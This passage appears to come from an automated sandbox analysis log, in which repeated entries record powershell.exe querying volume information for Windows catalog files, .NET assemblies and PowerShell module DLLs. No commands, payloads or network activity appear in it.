                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
